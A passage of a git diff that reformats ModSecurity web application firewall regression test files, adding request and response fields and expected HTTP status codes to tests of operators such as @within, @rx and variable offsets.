"200.249.12.31", + "port": 2313 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { "headers": { - "Host": "www.google.com" + "Host": "www.google.com", + "Content-Length": "0" }, - "uri": "\/test.pl?param1= test ¶m2=test2", - "body": "", - "method": "GET", - "http_version": 1.1 - }, - "response": { - "headers": "", - "body": "" - }, + "uri": "/test.pl?param1= test ¶m2=test2", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] + }, + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] + }, "expected": { - "audit_log": "", - "error_log": "", "http_code": 418 }, - "rules": [ - "SecRuleEngine On", - "SecDefaultAction \"phase:1,log,deny,status:418,tag:'Host: %{request_headers.host}'\"", - "SecDefaultAction \"phase:2,log,deny,status:418,tag:'Host: %{request_headers.host}'\"", - "SecAction \"id:'900012',phase:request,nolog,pass,t:none,setvar:'tx.allowed_methods=GET HEAD POST OPTIONS'\"", - "SecRule REQUEST_METHOD \"@within %{tx.allowed_methods}\" \"msg:'Method is not allowed by policy',severity:'WARNING',id:'960032',phase:request,block,rev:'2',ver:'OWASP_CRS/3.0.0',maturity:'9',accuracy:'9',tag:'application-multi',tag:'language-multi',tag:'platform-multi',tag:'attack-generic',tag:'OWASP_CRS/POLICY/METHOD_NOT_ALLOWED',tag:'WASCTC/WASC-15',tag:'OWASP_TOP_10/A6',tag:'OWASP_AppSensor/RE1',tag:'PCI/12.1',logdata:'%{matched_var}',setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.warning_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/POLICY/METHOD_NOT_ALLOWED-%{matched_var_name}=%{matched_var}\"" + "rules": [ + "SecRuleEngine On", + "SecDefaultAction \"phase:1,log,deny,status:418,tag:'Host: %{request_headers.host}'\"", + "SecDefaultAction \"phase:2,log,deny,status:418,tag:'Host: %{request_headers.host}'\"", + "SecAction \"id:'900012',phase:request,nolog,pass,t:none,setvar:'tx.allowed_methods=GET HEAD POST OPTIONS'\"", + "SecRule REQUEST_METHOD \"@within %{tx.allowed_methods}\" \"msg:'Method is not allowed by 
policy',severity:'WARNING',id:'960032',phase:request,block,rev:'2',ver:'OWASP_CRS/3.0.0',maturity:'9',accuracy:'9',tag:'application-multi',tag:'language-multi',tag:'platform-multi',tag:'attack-generic',tag:'OWASP_CRS/POLICY/METHOD_NOT_ALLOWED',tag:'WASCTC/WASC-15',tag:'OWASP_TOP_10/A6',tag:'OWASP_AppSensor/RE1',tag:'PCI/12.1',logdata:'%{matched_var}',setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.warning_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/POLICY/METHOD_NOT_ALLOWED-%{matched_var_name}=%{matched_var}\"" ] -}, -{ - "enabled": 1, - "version_min": 209000, - "version_max": -1, - "title": "!@within appears to fail (3/3)", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/960", - "gihub_issue": 960, - "client": { - "ip": "200.249.12.31", - "port": 2313 - }, - "server": { - "ip": "200.249.12.31", - "port": 80 }, - "request": { + { + "enabled": 1, + "version_min": 209000, + "version_max": -1, + "title": "!@within appears to fail (3/3)", + "url": "https://github.com/SpiderLabs/ModSecurity/issues/960", + "client": { + "ip": "200.249.12.31", + "port": 2313 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { "headers": { - "Host": "www.google.com" + "Host": "www.google.com", + "Content-Length": "0" }, - "uri": "\/test.pl?param1= test ¶m2=test2", - "body": "", - "method": "GET", - "http_version": 1.1 - }, - "response": { - "headers": "", - "body": "" - }, + "uri": "/test.pl?param1= test ¶m2=test2", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] + }, + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] + }, "expected": { - "audit_log": "", - "error_log": "", "http_code": 418 }, - "rules": [ - "SecRuleEngine On", - "SecDefaultAction \"phase:1,log,deny,status:418,tag:'Host: %{request_headers.host}'\"", - "SecDefaultAction \"phase:2,log,deny,status:418,tag:'Host: %{request_headers.host}'\"", - "SecAction 
\"id:'900012',phase:request,nolog,pass,t:none,setvar:'tx.allowed_methods=HEAD POST OPTIONS'\"", - "SecRule REQUEST_METHOD \"!@within %{tx.allowed_methods}\" \"msg:'Method is not allowed by policy',severity:'WARNING',id:'960032',phase:request,block,rev:'2',ver:'OWASP_CRS/3.0.0',maturity:'9',accuracy:'9',tag:'application-multi',tag:'language-multi',tag:'platform-multi',tag:'attack-generic',tag:'OWASP_CRS/POLICY/METHOD_NOT_ALLOWED',tag:'WASCTC/WASC-15',tag:'OWASP_TOP_10/A6',tag:'OWASP_AppSensor/RE1',tag:'PCI/12.1',logdata:'%{matched_var}',setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.warning_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/POLICY/METHOD_NOT_ALLOWED-%{matched_var_name}=%{matched_var}\"" + "rules": [ + "SecRuleEngine On", + "SecDefaultAction \"phase:1,log,deny,status:418,tag:'Host: %{request_headers.host}'\"", + "SecDefaultAction \"phase:2,log,deny,status:418,tag:'Host: %{request_headers.host}'\"", + "SecAction \"id:'900012',phase:request,nolog,pass,t:none,setvar:'tx.allowed_methods=HEAD POST OPTIONS'\"", + "SecRule REQUEST_METHOD \"!@within %{tx.allowed_methods}\" \"msg:'Method is not allowed by policy',severity:'WARNING',id:'960032',phase:request,block,rev:'2',ver:'OWASP_CRS/3.0.0',maturity:'9',accuracy:'9',tag:'application-multi',tag:'language-multi',tag:'platform-multi',tag:'attack-generic',tag:'OWASP_CRS/POLICY/METHOD_NOT_ALLOWED',tag:'WASCTC/WASC-15',tag:'OWASP_TOP_10/A6',tag:'OWASP_AppSensor/RE1',tag:'PCI/12.1',logdata:'%{matched_var}',setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.warning_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/POLICY/METHOD_NOT_ALLOWED-%{matched_var_name}=%{matched_var}\"" ] -} + } ] diff --git a/test/test-cases/regression/misc-variable-under-quotes.json b/test/test-cases/regression/misc-variable-under-quotes.json index c455b69dec..d2745cfc80 100644 --- a/test/test-cases/regression/misc-variable-under-quotes.json +++ b/test/test-cases/regression/misc-variable-under-quotes.json 
@@ -1,79 +1,90 @@ -[ - { - "enabled":1, - "version_min":300000, - "title":"Testing Variables (quoted) :: REQUEST_LINE - contains (1/2)", - "client":{ - "ip":"200.249.12.31", - "port":123 +[ + { + "enabled": 1, + "version_min": 300000, + "title": "Testing Variables (quoted) :: REQUEST_LINE - contains (1/2)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "0" }, - "uri":"/?key=value&key=other_value", - "method":"GET" + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." 
] }, - "expected":{ - "debug_log":"t:lowercase:" + "expected": { + "debug_log": "t:lowercase:", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRule \"REQUEST_LINE\" \"@contains index.php/admin/cms/wysiwyg/directive/\" \"id:1,phase:1,t:lowercase,ctl:auditLogParts=+E\"" ] }, - { - "enabled":1, - "version_min":300000, - "title":"Testing Variables (quoted) :: REQUEST_LINE - regex (2/2)", - "client":{ - "ip":"200.249.12.31", - "port":123 + { + "enabled": 1, + "version_min": 300000, + "title": "Testing Variables (quoted) :: REQUEST_LINE - regex (2/2)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "0" }, - "uri":"/?key=value&key=other_value", - "method":"GET" + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "debug_log":"t:lowercase:" + "expected": { + "debug_log": "t:lowercase:", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRule \"REQUEST_LINE\" \"index.php/admin/cms/wysiwyg/directive/\" \"id:1,t:lowercase,ctl:auditLogParts=+E\"" ] } ] - diff --git a/test/test-cases/regression/misc.json b/test/test-cases/regression/misc.json index f089459927..a61fec9785 100644 --- a/test/test-cases/regression/misc.json +++ b/test/test-cases/regression/misc.json 
@@ -1,15 +1,40 @@ [ { - "enabled":1, - "version_min":300000, - "version_max":0, - "title":"Testing action :: SecRule directives should be case insensitive", - "expected":{ - "audit_log":"", - "debug_log":"Executing operator \"Contains\" with param \"PHPSESSID\" against REQUEST_HEADERS.", - "error_log":"" + "enabled": 1, + "version_min": 300000, + "version_max": 0, + "title": "Testing action :: SecRule directives should be case insensitive", + "client": { + "ip": "", + "port": 0 }, - "rules":[ + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { + "Content-Length": "0" + }, + "uri": "", + "method": "", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] + }, + "expected": { + "debug_log": "Executing operator \"Contains\" with param \"PHPSESSID\" against REQUEST_HEADERS.", + "http_code": 200 + }, + "rules": [ "secruleengine On", "secrule REQUEST_HEADERS \"@contains PHPSESSID\" \"id:1,t:lowercase,t:none,msg:'This is a test, %{REQUEST_HEADERS:Accept}%'\"", "secrule TX \"@contains to_test\" \"id:2,t:lowercase,t:none\"" diff --git a/test/test-cases/regression/offset-variable.json b/test/test-cases/regression/offset-variable.json index 7ffe9299ba..6ee6d61ad4 100644 --- a/test/test-cases/regression/offset-variable.json +++ b/test/test-cases/regression/offset-variable.json 
@@ -1,1137 +1,1520 @@ [ { - "enabled":1, - "version_min":300000, - "title":"Variable offset - ARGS", - "request":{ - "headers":{ - "Host":"localhost", - "Content-Length": "27", + "enabled": 1, + "version_min": 300000, + "title": "Variable offset - ARGS", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { + "Host": "localhost", + "Content-Length": "0", "Content-Type": "application/x-www-form-urlencoded" }, - "uri":"/index.html?param1=value1¶m2=value1", - "method":"GET" + "uri": "/index.html?param1=value1¶m2=value1", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "error_log":"o0,3v23,6t:trim" + "expected": { + "error_log": "o0,3v23,6t:trim", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRule ARGS \"@rx val\" \"id:1,phase:2,pass,t:trim,msg:'ops'\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Variable offset - ARGS_GET", - "request":{ - "headers":{ - "Host":"localhost", - "Content-Length": "27", + "enabled": 1, + "version_min": 300000, + "title": "Variable offset - ARGS_GET", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { + "Host": "localhost", + "Content-Length": "0", "Content-Type": "application/x-www-form-urlencoded" }, - "uri":"/index.html?param1=value1¶m2=value2", - "method":"GET" + "uri": "/index.html?param1=value1¶m2=value2", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." 
] }, - "expected":{ - "error_log":"o3,3v37,6t:trim" + "expected": { + "error_log": "o3,3v37,6t:trim", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRule ARGS_GET \"@rx ue2\" \"id:1,phase:2,pass,t:trim,msg:'ops'\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Variable offset - ARGS_POST 1", - "request":{ - "headers":{ - "Host":"localhost", + "enabled": 1, + "version_min": 300000, + "title": "Variable offset - ARGS_POST 1", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { + "Host": "localhost", "Content-Length": "27", "Content-Type": "application/x-www-form-urlencoded" }, - "uri":"/index.html?param1=value1¶m2=value1", - "method":"POST", - "body":[ + "uri": "/index.html?param1=value1¶m2=value1", + "method": "POST", + "body": [ "param1=value1¶m2=value1" ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." 
] }, - "expected":{ - "error_log":"o3,3v142,6t:trim" + "expected": { + "error_log": "o3,3v142,6t:trim", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecRule ARGS_POST \"@rx ue1\" \"id:1,phase:2,pass,t:trim,msg:'ops'\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Variable offset - ARGS_POST 2", - "request":{ - "headers":{ - "Host":"localhost", - "Content-Length": "27", + "enabled": 1, + "version_min": 300000, + "title": "Variable offset - ARGS_POST 2", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { + "Host": "localhost", + "Content-Length": "41", "Content-Type": "application/x-www-form-urlencoded" }, - "uri":"/index.html?param1=value1¶m2=value1", - "method":"POST", - "body":[ + "uri": "/index.html?param1=value1¶m2=value1", + "method": "POST", + "body": [ "param1=value1¶m2=value2¶m3=value3" ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." 
] }, - "expected":{ - "error_log":"o3,3v156,6t:trim" + "expected": { + "error_log": "o3,3v156,6t:trim", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecRule ARGS_POST \"@rx ue2\" \"id:1,phase:2,pass,t:trim,msg:'ops'\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Variable offset - ARGS_GET_NAMES 1", - "request":{ - "headers":{ - "Host":"localhost", - "Content-Length": "27", + "enabled": 1, + "version_min": 300000, + "title": "Variable offset - ARGS_GET_NAMES 1", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { + "Host": "localhost", + "Content-Length": "41", "Content-Type": "application/x-www-form-urlencoded" }, - "uri":"/index.html?param1=value1¶m2=value1", - "method":"POST", - "body":[ + "uri": "/index.html?param1=value1¶m2=value1", + "method": "POST", + "body": [ "param1=value1¶m2=value2¶m3=value3" ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." 
] }, - "expected":{ - "error_log":"o0,6v17,6t:trim" + "expected": { + "error_log": "o0,6v17,6t:trim", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecRule ARGS_GET_NAMES \"@rx param1\" \"id:1,phase:2,pass,t:trim,msg:'ops'\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Variable offset - ARGS_GET_NAMES 2", - "request":{ - "headers":{ - "Host":"localhost", - "Content-Length": "27", + "enabled": 1, + "version_min": 300000, + "title": "Variable offset - ARGS_GET_NAMES 2", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { + "Host": "localhost", + "Content-Length": "41", "Content-Type": "application/x-www-form-urlencoded" }, - "uri":"/index.html?param1=value1¶m2=value1", - "method":"POST", - "body":[ + "uri": "/index.html?param1=value1¶m2=value1", + "method": "POST", + "body": [ "param1=value1¶m2=value2¶m3=value3" ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." 
] }, - "expected":{ - "error_log":"o0,6v31,6t:trim" + "expected": { + "error_log": "o0,6v31,6t:trim", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecRule ARGS_GET_NAMES \"@rx param2\" \"id:1,phase:2,pass,t:trim,msg:'ops'\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Variable offset - ARGS_GET_NAMES 3", - "request":{ - "headers":{ - "Host":"localhost", - "Content-Length": "27", + "enabled": 1, + "version_min": 300000, + "title": "Variable offset - ARGS_GET_NAMES 3", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { + "Host": "localhost", + "Content-Length": "41", "Content-Type": "application/x-www-form-urlencoded" }, - "uri":"/index.html?param1=value1¶m2=value1", - "method":"POST", - "body":[ + "uri": "/index.html?param1=value1¶m2=value1", + "method": "POST", + "body": [ "param1=value1¶m2=value2¶m3=value3" ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." 
] }, - "expected":{ + "expected": { + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecRule ARGS_GET_NAMES \"@rx am1 par\" \"id:1,phase:2,pass,t:trim,msg:'ops'\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Variable offset - ARGS_GET_NAMES 4", - "request":{ - "headers":{ - "Host":"localhost", - "Content-Length": "27", + "enabled": 1, + "version_min": 300000, + "title": "Variable offset - ARGS_GET_NAMES 4", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { + "Host": "localhost", + "Content-Length": "41", "Content-Type": "application/x-www-form-urlencoded" }, - "uri":"/index.html?param1=value1¶m2=value1¶m3=value1", - "method":"POST", - "body":[ + "uri": "/index.html?param1=value1¶m2=value1¶m3=value1", + "method": "POST", + "body": [ "param1=value1¶m2=value2¶m3=value3" ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." 
] }, - "expected":{ + "expected": { + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecRule ARGS_GET_NAMES \"@rx am1 param2 par\" \"id:1,phase:2,pass,t:trim,msg:'ops'\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Variable offset - ARGS_POST_NAMES", - "request":{ - "headers":{ - "Host":"localhost", - "Content-Length": "27", + "enabled": 1, + "version_min": 300000, + "title": "Variable offset - ARGS_POST_NAMES", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { + "Host": "localhost", + "Content-Length": "41", "Content-Type": "application/x-www-form-urlencoded" }, - "uri":"/index.html?param1=value1¶m2=value1¶m3=value1", - "method":"POST", - "body":[ + "uri": "/index.html?param1=value1¶m2=value1¶m3=value1", + "method": "POST", + "body": [ "param1=value1¶m2=value2¶m3=value3" ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." 
] }, - "expected":{ - "error_log": "0,6v149,6t:trim" + "expected": { + "error_log": "0,6v149,6t:trim", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecRule ARGS_POST_NAMES \"@rx param1\" \"id:1,phase:2,pass,t:trim,msg:'ops'\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Variable offset - ARGS_NAMES", - "request":{ - "headers":{ - "Host":"localhost", - "Content-Length": "27", + "enabled": 1, + "version_min": 300000, + "title": "Variable offset - ARGS_NAMES", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { + "Host": "localhost", + "Content-Length": "41", "Content-Type": "application/x-www-form-urlencoded" }, - "uri":"/index.html?param1=value1¶m2=value1¶m3=value1", - "method":"POST", - "body":[ + "uri": "/index.html?param1=value1¶m2=value1¶m3=value1", + "method": "POST", + "body": [ "param1=value1¶m2=value2¶m3=value3" ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." 
] }, - "expected":{ - "error_log":"o0,6v17,6t:trim" + "expected": { + "error_log": "o0,6v17,6t:trim", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecRule ARGS_NAMES \"@rx param1\" \"id:1,phase:2,pass,t:trim,msg:'ops'\"" ] }, - { - "enabled":1, - "version_min":300000, - "title":"Variable offset - ARGS_COMBINED_SIZE 1", - "request":{ - "headers":{ - "Host":"localhost", - "Content-Length": "27", + { + "enabled": 1, + "version_min": 300000, + "title": "Variable offset - ARGS_COMBINED_SIZE 1", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { + "Host": "localhost", + "Content-Length": "0", "Content-Type": "application/x-www-form-urlencoded" }, - "uri":"/index.html?param1=value1¶m2=value1¶m3=value1", - "method":"GET" + "uri": "/index.html?param1=value1¶m2=value1¶m3=value1", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." 
] }, - "expected":{ - "error_log":"v16,6v23,6v30,6v37,6v44,6v51,6t:trim" + "expected": { + "error_log": "v16,6v23,6v30,6v37,6v44,6v51,6t:trim", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecRule ARGS_COMBINED_SIZE \"@gt 1\" \"id:1,phase:2,pass,t:trim,msg:'ops'\"" ] - }, - { - "enabled":1, - "version_min":300000, - "title":"Variable offset - ARGS_COMBINED_SIZE 2", - "request":{ - "headers":{ - "Host":"localhost", - "Content-Length": "27", + }, + { + "enabled": 1, + "version_min": 300000, + "title": "Variable offset - ARGS_COMBINED_SIZE 2", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { + "Host": "localhost", + "Content-Length": "0", "Content-Type": "application/x-www-form-urlencoded" }, - "uri":"/index.html?param1=value1¶m2=value1¶m3=value1", - "method":"GET" + "uri": "/index.html?param1=value1¶m2=value1¶m3=value1", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." 
] }, - "expected":{ - "error_log":"v16,6v23,6v30,6v37,6v44,6v51,6t:trim" + "expected": { + "error_log": "v16,6v23,6v30,6v37,6v44,6v51,6t:trim", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecRule ARGS_COMBINED_SIZE \"@gt 1\" \"id:1,phase:2,pass,t:trim,msg:'ops'\"" ] }, - { - "enabled":1, - "version_min":300000, - "title":"Variable offset - REQUEST_LINE", - "request":{ - "headers":{ - "Host":"localhost", - "Content-Length": "27", + { + "enabled": 1, + "version_min": 300000, + "title": "Variable offset - REQUEST_LINE", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { + "Host": "localhost", + "Content-Length": "0", "Content-Type": "application/x-www-form-urlencoded", "AuThOrIzAtIoN": "Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==" }, - "uri":"/index.html?param1=value1¶m2=value1¶m3=value1", - "method":"GET" + "uri": "/index.html?param1=value1¶m2=value1¶m3=value1", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." 
] }, - "expected":{ - "error_log":"o23,6v0,63t:trim" + "expected": { + "error_log": "o23,6v0,63t:trim", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecRule REQUEST_LINE \"value1\" \"id:1,phase:2,pass,t:trim,msg:'ops'\"" ] }, - { - "enabled":1, - "version_min":300000, - "title":"Variable offset - REQUEST_METHOD", - "request":{ - "headers":{ - "Host":"localhost", - "Content-Length": "27", + { + "enabled": 1, + "version_min": 300000, + "title": "Variable offset - REQUEST_METHOD", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { + "Host": "localhost", + "Content-Length": "0", "Content-Type": "application/x-www-form-urlencoded", "AuThOrIzAtIoN": "Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==" }, - "uri":"/index.html?param1=value1¶m2=value1¶m3=value1", - "method":"GET", - "http_version": 1.1 + "uri": "/index.html?param1=value1¶m2=value1¶m3=value1", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." 
] }, - "expected":{ - "error_log":"o0,3v0,3t:trim" + "expected": { + "error_log": "o0,3v0,3t:trim", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecRule REQUEST_METHOD \"GET\" \"id:1,phase:2,pass,t:trim,msg:'ops'\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Variable offset - REQUEST_PROTOCOL", - "request":{ - "headers":{ - "Host":"localhost", - "Content-Length": "27", + "enabled": 1, + "version_min": 300000, + "title": "Variable offset - REQUEST_PROTOCOL", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { + "Host": "localhost", + "Content-Length": "0", "Content-Type": "application/x-www-form-urlencoded", "AuThOrIzAtIoN": "Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==" }, - "uri":"/index.html?param1=value1¶m2=value1¶m3=value1", - "method":"GET", - "http_version": 1.1 + "uri": "/index.html?param1=value1¶m2=value1¶m3=value1", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." 
